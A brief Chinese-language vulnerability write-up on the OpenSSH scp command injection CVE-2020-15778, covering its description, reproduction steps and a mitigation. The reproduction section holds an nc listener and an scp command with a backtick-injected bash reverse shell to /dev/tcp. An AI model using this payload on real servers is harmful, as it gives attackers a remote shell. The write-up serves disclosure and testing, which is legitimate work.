OpenSSH 命令注入漏洞

漏洞編號：

CVE-2020-15778

漏洞介紹：

OpenSSH（OpenBSD Secure Shell）是OpenBSD計劃組的一套用於安全訪問遠端計算機的連線工具。該工具是SSH協議的開源實現，支援對所有的傳輸進行加密，可有效阻止竊聽、連線劫持以及其他網路級的攻擊。OpenSSH 8.6p1及之前版本中的scp的scp.c檔案存在命令注入漏洞。該漏洞源於外部輸入資料構造可執行命令過程中，網路系統或產品未正確過濾其中的特殊元素。攻擊者可利用該漏洞執行非法命令。該漏洞發生於 OpenSSH <= 8.3p1 系統，即使在禁用ssh登入的情況下，但是允許使用scp傳檔案，而且遠端伺服器允許使用反引號(`)，可利用scp複製檔案到遠端伺服器時，執行帶有payload的scp命令，從而在後續利用中getshell。scp是 secure copy的縮寫, scp是linux系統下基於ssh登陸進行安全的遠端檔案拷貝命令。linux的scp命令可以在linux伺服器之間複製檔案和目錄。

漏洞驗證：

1、靶機開啟ssh服務（Linux）

開啟ssh：systemctl start sshd

版本號：openssh <= openssh-8.3p1

前提條件：知道靶機使用者名稱和密碼

2、kali開啟本地監聽

#開啟監聽

nc -lvvp 9999

#反彈shell

Scp test.txt username@target:`’bash -i >& /dev/tcp/localhost/localport 0>&1` /tmp/test1.txt’

#輸入密碼（kali預設無顯示）

漏洞修復：

可以禁用scp，改用rsync等緩解風險（可能會導致小檔案機器內拷貝變慢）